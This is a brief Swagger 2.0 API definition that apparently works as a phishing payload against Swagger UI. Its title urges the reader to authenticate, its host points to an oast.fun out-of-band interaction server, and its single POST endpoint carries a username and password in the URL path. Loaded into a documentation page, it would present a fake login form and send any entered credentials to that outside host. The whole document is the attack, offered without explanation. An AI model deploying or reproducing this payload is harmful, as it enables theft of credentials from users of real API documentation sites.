swagger: "2.0"
info:
  version: "v1"
  title: You must authenticate before you can proceed!

host: ujwgauqhykyfyrmelclclfgm557954lld.oast.fun

paths:

  /{Username}/{Password}:
    post:
      summary: Logs in
      parameters:
        - name: Username 
          required: true
          in: path
          type: string
        - name: Password 
          required: true
          in: path
          type: string
      responses:
        200:
          description: Login was successful
